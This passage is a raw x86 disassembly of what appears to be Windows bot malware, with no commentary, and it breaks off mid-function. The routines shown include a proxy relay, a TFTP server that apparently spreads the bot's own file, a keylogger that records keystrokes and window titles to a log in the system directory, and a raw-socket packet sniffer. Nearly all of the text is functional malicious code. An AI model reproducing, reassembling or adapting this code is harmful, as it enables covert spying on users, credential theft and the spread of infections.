call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411D33: ; CODE XREF: sub_411CB2+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call ds:dword_4E2FE0 ; recv
test eax, eax
jg short loc_411D64
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411D64: ; CODE XREF: sub_411CB2+98�j
cmp [ebp+var_4D0], 4
jnz loc_411F5E
cmp [ebp+var_4CF], 1
jnz loc_411F5E
cmp [ebp+var_44], bl
jz short loc_411DFA
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_411DFA
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset dword_44B58C
call sub_415AB0
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_41E4B0
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4E3018 ; send
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411DFA: ; CODE XREF: sub_411CB2+CF�j
; sub_411CB2+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_41E4B0
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call ds:dword_4E3048 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_411E92
call ds:dword_4E2F5C ; WSAGetLastError
push eax
push offset dword_44B5CC
call sub_415AB0
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_41E4B0
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4E3018 ; send
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411E92: ; CODE XREF: sub_411CB2+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_411F01
call ds:dword_4E2F5C ; WSAGetLastError
push eax
push offset dword_44B610
call sub_415AB0
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_41E4B0
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4E3018 ; send
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411F01: ; CODE XREF: sub_411CB2+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4E3018 ; send
push dword ptr [esi]
push edi
call sub_411F76
pop ecx
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411F5E: ; CODE XREF: sub_411CB2+B9�j
; sub_411CB2+C6�j
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_411CB2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411F76 proc near ; CODE XREF: sub_411CB2+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_411F8C: ; CODE XREF: sub_411F76+BE�j
; sub_411F76+EE�j
xor ecx, ecx
mov [ebp+var_100], ebx
inc ecx
xor eax, eax
mov [ebp+var_104], ecx
loc_411F9D: ; CODE XREF: sub_411F76+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_411FAE
inc eax
cmp eax, ecx
jb short loc_411F9D
loc_411FAE: ; CODE XREF: sub_411F76+31�j
cmp eax, ecx
jnz short loc_411FC2
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_411FC2: ; CODE XREF: sub_411F76+3A�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call ds:dword_4E2FB0 ; select
lea eax, [ebp+var_104]
push eax
push ebx
call ds:dword_4E2EB4 ; __WSAFDIsSet
test eax, eax
jz short loc_412022
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call ds:dword_4E2FE0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_41206A
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41206A
loc_412022: ; CODE XREF: sub_411F76+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call ds:dword_4E2EB4 ; __WSAFDIsSet
test eax, eax
jz loc_411F8C
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call ds:dword_4E2FE0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_41206A
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jnz loc_411F8C
loc_41206A: ; CODE XREF: sub_411F76+93�j
; sub_411F76+AA�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_411F76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41206F proc near ; CODE XREF: sub_41206F:loc_4124DA�p
; DATA XREF: sub_401C87+20B2�o ...
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_778 = byte ptr -778h
var_578 = byte ptr -578h
var_577 = byte ptr -577h
var_576 = byte ptr -576h
var_575 = byte ptr -575h
var_574 = byte ptr -574h
var_374 = dword ptr -374h
var_370 = byte ptr -370h
var_26C = byte ptr -26Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
var_50 = byte ptr -50h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 87Ch
mov edx, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
push edi
xor eax, eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_374]
push ebx
inc eax
push 2
rep movsd
inc [ebp+var_164]
push 2
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_8], eax
mov [edx+2A0h], eax
call ds:dword_4E3048 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_41210F
push 190h
call ds:dword_4F534C ; Sleep
cmp [ebp+var_D8], ebx
jnz short loc_4120EF
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409C75
add esp, 14h
loc_4120EF: ; CODE XREF: sub_41206F+5B�j
lea eax, [ebp+var_778]
push eax
call sub_415A3C
push [ebp+var_168]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_41210F: ; CODE XREF: sub_41206F+48�j
lea eax, [ebp+var_10]
push 4
push eax
mov edi, 0FFFFh
push 4
push edi
push esi
call ds:dword_4E2FA8 ; setsockopt
lea eax, [ebp+var_14]
push 4
push eax
push 0FFFFFFFBh
push edi
push esi
call ds:dword_4E2FA8 ; setsockopt
mov eax, [ebp+var_168]
push 10h
imul eax, 234h
push ebx
mov ds:dword_455F0C[eax], esi
lea eax, [ebp+var_2C]
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_2C], 2
push [ebp+var_160]
call ds:dword_4E2FC8 ; htons
mov [ebp+var_2A], ax
lea eax, [ebp+var_2C]
push 10h
push eax
push esi
mov [ebp+var_28], ebx
call ds:dword_4E2FF4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412199
push 1388h
call ds:dword_4F534C ; Sleep
dec [ebp+var_164]
push [ebp+arg_0]
jmp loc_4124DA
; ---------------------------------------------------------------------------
loc_412199: ; CODE XREF: sub_41206F+10F�j
lea eax, [ebp+var_370]
push offset aRb_0 ; "rb"
push eax
call sub_41E490
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_4121FF
push 190h
call ds:dword_4F534C ; Sleep
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409C75
lea eax, [ebp+var_778]
push eax
call sub_415A3C
push [ebp+var_168]
call sub_40B9A7
add esp, 1Ch
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4121FF: ; CODE XREF: sub_41206F+142�j
; sub_41206F+425�j
mov edi, [ebp+arg_0]
cmp [edi+2A0h], ebx
jz loc_41249D
mov edi, 80h
lea eax, [ebp+var_D0]
push edi
push ebx
push eax
mov [ebp+var_1C], 5
mov [ebp+var_18], 1388h
mov [ebp+var_878], esi
mov [ebp+var_87C], 1
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_87C]
push ebx
push eax
push ebx
call ds:dword_4E2FB0 ; select
test eax, eax
jle loc_412491
mov al, ds:byte_4E5D24
mov ecx, edi
mov [ebp+var_578], al
xor eax, eax
lea edi, [ebp+var_577]
mov [ebp+var_C], 10h
rep stosd
stosw
stosb
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_3C]
push eax
push ebx
lea eax, [ebp+var_D0]
push 80h
push eax
push esi
call ds:dword_4E2FA0 ; recvfrom
push [ebp+var_38]
mov [ebp+var_8], eax
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_50]
push eax
call sub_41EA60
cmp [ebp+var_D0], bl
pop ecx
pop ecx
jnz loc_41247B
cmp [ebp+var_CF], 1
jnz loc_412387
lea eax, [ebp+var_26C]
push eax
call sub_41BC70
push ebx
push ebx
push [ebp+var_4]
call sub_420FE0
push [ebp+var_4]
lea eax, [ebp+var_574]
mov [ebp+var_578], bl
mov [ebp+var_577], 3
push 200h
push 1
push eax
mov [ebp+var_576], bl
mov [ebp+var_575], 1
call sub_41E180
add esp, 20h
lea ecx, [ebp+var_3C]
mov [ebp+var_8], eax
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call ds:dword_4E302C ; sendto
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferSt ; "Tftp transfer started to: %s"
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_412375
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409C75
add esp, 14h
loc_412375: ; CODE XREF: sub_41206F+2E1�j
lea eax, [ebp+var_778]
push eax
call sub_415A3C
pop ecx
jmp loc_412491
; ---------------------------------------------------------------------------
loc_412387: ; CODE XREF: sub_41206F+257�j
cmp [ebp+var_CF], 4
jnz loc_41247B
mov cl, [ebp+var_CD]
mov al, [ebp+var_CE]
cmp cl, 0FFh
mov [ebp+var_578], bl
mov [ebp+var_577], 3
jnz short loc_4123BE
inc al
xor cl, cl
mov [ebp+var_575], bl
jmp short loc_4123C6
; ---------------------------------------------------------------------------
loc_4123BE: ; CODE XREF: sub_41206F+341�j
inc cl
mov [ebp+var_575], cl
loc_4123C6: ; CODE XREF: sub_41206F+34D�j
mov [ebp+var_576], al
mov edi, 200h
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, edi
push eax
push [ebp+var_4]
call sub_420FE0
push [ebp+var_4]
lea eax, [ebp+var_574]
push edi
push 1
push eax
call sub_41E180
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_3C]
mov [ebp+var_8], edi
push [ebp+var_C]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call ds:dword_4E302C ; sendto
cmp edi, ebx
jnz short loc_412491
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferCo ; "Tftp transfer complete to: %s"
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_412466
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409C75
add esp, 14h
loc_412466: ; CODE XREF: sub_41206F+3D2�j
lea eax, [ebp+var_778]
push eax
call sub_415A3C
inc ds:dword_4E5AC8
pop ecx
jmp short loc_412491
; ---------------------------------------------------------------------------
loc_41247B: ; CODE XREF: sub_41206F+24A�j
; sub_41206F+31F�j
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
push ebx
push 9
push offset dword_44B698
push esi
call ds:dword_4E302C ; sendto
loc_412491: ; CODE XREF: sub_41206F+1E9�j
; sub_41206F+313�j ...
cmp [ebp+var_8], ebx
jg loc_4121FF
mov edi, [ebp+arg_0]
loc_41249D: ; CODE XREF: sub_41206F+199�j
push esi
call ds:dword_4E3060 ; closesocket
push [ebp+var_4]
call sub_41BCF0
dec [ebp+var_164]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_4124CE
push [ebp+var_168]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4124CE: ; CODE XREF: sub_41206F+44A�j
push 3E8h
call ds:dword_4F534C ; Sleep
push edi
loc_4124DA: ; CODE XREF: sub_41206F+125�j
call sub_41206F
pop edi
pop esi
pop ebx
leave
retn 4
sub_41206F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124E6 proc near ; CODE XREF: sub_4125C5+B4�p
; sub_4125C5+247�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4F5404 ; GetLocalTime
lea eax, [ebp+var_114]
push 104h
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push offset dword_44BE14
push eax
call sub_41F630
lea eax, [ebp+var_114]
push offset dword_43F108
push eax
call sub_41F630
lea eax, [ebp+var_114]
push offset dword_44BE18
push eax
call sub_41E490
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_41254B
inc eax
jmp short loc_4125C2
; ---------------------------------------------------------------------------
loc_41254B: ; CODE XREF: sub_4124E6+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_41F4E0
push esi
call sub_41BCF0
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_4125C0
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset dword_44BE38
push 200h
push eax
call sub_41EC30
push 0
lea eax, [ebp+var_314]
push [ebp+arg_8C]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_409C75
add esp, 24h
loc_4125C0: ; CODE XREF: sub_4124E6+A1�j
xor eax, eax
loc_4125C2: ; CODE XREF: sub_4124E6+63�j
pop esi
leave
retn
sub_4124E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125C5 proc near ; DATA XREF: sub_401C87+44DA�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_4DC = byte ptr -4DCh
var_2DD = byte ptr -2DDh
var_2DC = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call ds:dword_4E2F4C ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_4E2F64 ; GetWindowTextA
mov ebx, 200h
loc_412620: ; CODE XREF: sub_4125C5+2BB�j
push 8
call ds:dword_4F534C ; Sleep
call ds:dword_4E2F4C ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_4126A8
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_4E2F64 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_4DC]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_41EA60
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4124E6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_41E4B0
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_41E4B0
add esp, 0Ch
loc_4126A8: ; CODE XREF: sub_4125C5+6C�j
mov [ebp+arg_0], offset dword_44B6AC
loc_4126AF: ; CODE XREF: sub_4125C5+2B1�j
push 10h
call ds:dword_4E2E9C ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call ds:dword_4E2F94 ; GetAsyncKeyState
test ah, ah
jns short loc_412746
push 14h
call ds:dword_4E2E9C ; GetKeyState
test ax, ax
jz short loc_4126F7
cmp esi, 0FFFFFFFFh
jle short loc_4126F7
cmp edi, 40h
jle short loc_4126F7
cmp edi, 5Bh
jge short loc_4126F7
mov [ebp+edi*4+var_8DC], 1
jmp loc_41286B
; ---------------------------------------------------------------------------
loc_4126F7: ; CODE XREF: sub_4125C5+111�j
; sub_4125C5+116�j ...
push 14h
call ds:dword_4E2E9C ; GetKeyState
test ax, ax
jz short loc_412722
test esi, esi
jge short loc_412736
cmp edi, 40h
jle short loc_412722
cmp edi, 5Bh
jge short loc_412722
mov [ebp+edi*4+var_8DC], 2
jmp loc_41286B
; ---------------------------------------------------------------------------
loc_412722: ; CODE XREF: sub_4125C5+13D�j
; sub_4125C5+146�j ...
test esi, esi
jge short loc_412736
mov [ebp+edi*4+var_8DC], 3
jmp loc_41286B
; ---------------------------------------------------------------------------
loc_412736: ; CODE XREF: sub_4125C5+141�j
; sub_4125C5+15F�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_41286B
; ---------------------------------------------------------------------------
loc_412746: ; CODE XREF: sub_4125C5+104�j
lea eax, [ebp+edi*4+var_8DC]
mov esi, [eax]
test esi, esi
jz loc_41286B
and dword ptr [eax], 0
lea eax, [ebp+var_2DC]
push eax
call sub_41BC70
cmp edi, 8
pop ecx
jnz short loc_412779
and [ebp+eax+var_2DD], 0
jmp loc_41286B
; ---------------------------------------------------------------------------
loc_412779: ; CODE XREF: sub_4125C5+1A5�j
cmp eax, 1B9h
jbe short loc_4127A5
call ds:dword_4E2F4C ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_4E2F64 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4127E6
; ---------------------------------------------------------------------------
loc_4127A5: ; CODE XREF: sub_4125C5+1B9�j
cmp edi, 0Dh
jnz loc_41283D
lea eax, [ebp+var_2DC]
push eax
call sub_41BC70
test eax, eax
pop ecx
jz loc_41286B
call ds:dword_4E2F4C ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_4E2F64 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_4127E6: ; CODE XREF: sub_4125C5+1DE�j
lea eax, [ebp+var_4DC]
push eax
call sub_41EA60
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4124E6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_41E4B0
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_41E4B0
add esp, 0Ch
jmp short loc_41286B
; ---------------------------------------------------------------------------
loc_41283D: ; CODE XREF: sub_4125C5+1E3�j
cmp esi, 1
jz short loc_412856
cmp esi, 3
jz short loc_412856
cmp esi, 2
jz short loc_412851
cmp esi, 4
jnz short loc_41286B
loc_412851: ; CODE XREF: sub_4125C5+285�j
push [ebp+arg_0]
jmp short loc_41285D
; ---------------------------------------------------------------------------
loc_412856: ; CODE XREF: sub_4125C5+27B�j
; sub_4125C5+280�j
mov eax, [ebp+arg_0]
add eax, 7
push eax
loc_41285D: ; CODE XREF: sub_4125C5+28F�j
lea eax, [ebp+var_2DC]
push eax
call sub_41F630
pop ecx
pop ecx
loc_41286B: ; CODE XREF: sub_4125C5+12D�j
; sub_4125C5+158�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_44BDDC
jl loc_4126AF
cmp [ebp+var_4], 0
jz loc_412620
push [ebp+var_D8]
call sub_40B9A7
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_4125C5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41289A proc near ; DATA XREF: sub_401C87+4106�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_41EF80
mov edx, [ebp+arg_0]
push esi
push edi
push 25h
xor eax, eax
pop ecx
mov esi, edx
lea edi, [ebp+var_B4]
inc eax
push 10h
rep movsd
mov [ebp+var_8], eax
mov [edx+90h], eax
xor esi, esi
lea eax, [ebp+var_1C]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call ds:dword_4E2FC8 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AEAD
pop ecx
push eax
call ds:dword_4E3008 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call ds:dword_4E3048 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_41296F
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_44C718
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412952
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409C75
add esp, 14h
loc_412952: ; CODE XREF: sub_41289A+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_415A3C
push [ebp+var_30]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_41296F: ; CODE XREF: sub_41289A+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov ds:dword_455F0C[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call ds:dword_4E2FF4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4129F4
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_44C744
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_4129D0
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409C75
add esp, 14h
loc_4129D0: ; CODE XREF: sub_41289A+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_415A3C
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_30]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_4129F4: ; CODE XREF: sub_41289A+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call ds:dword_4E2F74 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_412A77
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_44C770
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412A53
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409C75
add esp, 14h
loc_412A53: ; CODE XREF: sub_41289A+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_415A3C
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_30]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_412A77: ; CODE XREF: sub_41289A+177�j
push ebx
mov ebx, offset dword_44BEC0
loc_412A7D: ; CODE XREF: sub_41289A+21C�j
; sub_41289A+22E�j ...
push 0FFFFh
lea eax, [ebp+var_102B4]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push 0FFFFh
push eax
push edi
call ds:dword_4E2FE0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_412BA6
cmp [ebp+var_102AB], 6
jnz short loc_412A7D
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_412A7D
lea eax, [ebp+var_1028C]
push offset aPsniff_0 ; "[PSNIFF]"
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412A7D
lea eax, [ebp+var_1028C]
push offset dword_44C7AC
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412A7D
xor edi, edi
mov eax, ebx
mov [ebp+arg_0], ebx
loc_412AFF: ; CODE XREF: sub_41289A+280�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_412B24
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_412AFF
loc_412B1C: ; CODE XREF: sub_41289A+307�j
mov edi, [ebp+var_4]
jmp loc_412A7D
; ---------------------------------------------------------------------------
loc_412B24: ; CODE XREF: sub_41289A+276�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call ds:dword_4E2EF8 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, ds:dword_44BED4[eax*8]
push ds:off_44BEAC[eax*4]
lea eax, [ebp+var_2B4]
push offset dword_44C7BC
push 200h
push eax
call sub_41EC30
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_412B94
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
